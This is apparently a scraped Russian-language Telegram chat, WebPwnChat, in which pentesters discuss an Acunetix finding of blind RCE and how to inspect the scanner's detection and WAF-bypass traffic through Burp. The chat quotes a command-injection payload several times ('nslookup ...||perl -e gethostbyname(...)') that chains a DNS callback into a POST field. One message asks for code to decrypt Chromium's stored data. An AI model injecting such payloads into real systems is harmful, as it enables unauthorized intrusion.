Size: a a a

2021 January 05

᠌᠌Sh1Yo in WebPwnChat
Тем что в полиси написан 🤔
источник
2021 January 06

👾0

👾 0x1 in WebPwnChat
а как возможно то что окунь нашел rce:
"URL encoded POST input text was set to (nslookup hitfpxqsobzcr0fbec.bxss.me||perl -e "gethostbyname('hitfpxqsobzcr0fbec.bxss.me')")"
Proof of Exploit
DNS lookup - hitfpxqsobzcr0fbec.bxss.me

DNS IP: *.*.*.*
DNS TYPE: A
DNS QUERY: hitfpxqsobzcr0fbec.bxss.me
но по факту окунь у себя в HTTP Response выдал вернул обычный ответ json
источник

<ᅠ

<404> ᅠ in WebPwnChat
👾 0x1
а как возможно то что окунь нашел rce:
"URL encoded POST input text was set to (nslookup hitfpxqsobzcr0fbec.bxss.me||perl -e "gethostbyname('hitfpxqsobzcr0fbec.bxss.me')")"
Proof of Exploit
DNS lookup - hitfpxqsobzcr0fbec.bxss.me

DNS IP: *.*.*.*
DNS TYPE: A
DNS QUERY: hitfpxqsobzcr0fbec.bxss.me
но по факту окунь у себя в HTTP Response выдал вернул обычный ответ json
это оффлайн кряк?
источник

👾0

👾 0x1 in WebPwnChat
я отрубал лишь сервисы окуня и бд, после менял права на лицу и все
источник

GD

Green Dog in WebPwnChat
👾 0x1
а как возможно то что окунь нашел rce:
"URL encoded POST input text was set to (nslookup hitfpxqsobzcr0fbec.bxss.me||perl -e "gethostbyname('hitfpxqsobzcr0fbec.bxss.me')")"
Proof of Exploit
DNS lookup - hitfpxqsobzcr0fbec.bxss.me

DNS IP: *.*.*.*
DNS TYPE: A
DNS QUERY: hitfpxqsobzcr0fbec.bxss.me
но по факту окунь у себя в HTTP Response выдал вернул обычный ответ json
а в чем вопрос? это может быть блайнд рце
источник

👾0

👾 0x1 in WebPwnChat
Green Dog
а в чем вопрос? это может быть блайнд рце
блет точно, спасибо
источник

GD

Green Dog in WebPwnChat
или чтото между вам зарезолвило кусок параметра (ваф например)
источник

<ᅠ

<404> ᅠ in WebPwnChat
Green Dog
а в чем вопрос? это может быть блайнд рце
лол ты подписан как акунетикс
можно тогда сразу вопрос? можно ли вытащить из аку механизм поиска и детекта sqli?
источник

A

Andrew in WebPwnChat
У кого то есть дешифрования хромиум json на c++ реализованный?
источник

<ᅠ

<404> ᅠ in WebPwnChat
<404> ᅠ
лол ты подписан как акунетикс
можно тогда сразу вопрос? можно ли вытащить из аку механизм поиска и детекта sqli?
чтобы понимать как он ваф обходил и тд тп
источник

WS

Web Security in WebPwnChat
<404> ᅠ
чтобы понимать как он ваф обходил и тд тп
Проксируй траф на Бурп и смотри реквесты
источник

GD

Green Dog in WebPwnChat
вот да
источник

<ᅠ

<404> ᅠ in WebPwnChat
Web Security
Проксируй траф на Бурп и смотри реквесты
так можно? О_о
источник

GD

Green Dog in WebPwnChat
самый просто вариант
источник

s

s̢̍̌͗ͧͫ͊ͧͫͮ̂̒̇̅̌̐͆́͡... in WebPwnChat
<404> ᅠ
так можно? О_о
Не обязательно же проксировать явно для акунетикса
Можно проксировать и софт, который в принципе возможности установки прокси не имеет
источник

GD

Green Dog in WebPwnChat
можно ещё исходники скриптов вынуть
источник

GD

Green Dog in WebPwnChat
акунетикс поддерживает прокси для сканов
источник

s

s̢̍̌͗ͧͫ͊ͧͫͮ̂̒̇̅̌̐͆́͡... in WebPwnChat
Green Dog
акунетикс поддерживает прокси для сканов
Хах, тем более
источник

GD

Green Dog in WebPwnChat
<404> ᅠ
чтобы понимать как он ваф обходил и тд тп
но ваф окунь обоходить не умеет
источник

<ᅠ

<404> ᅠ in WebPwnChat
Green Dog
но ваф окунь обоходить не умеет
если привести аналогию с sqlmap, то аку использует что-то по типу тамперов
источник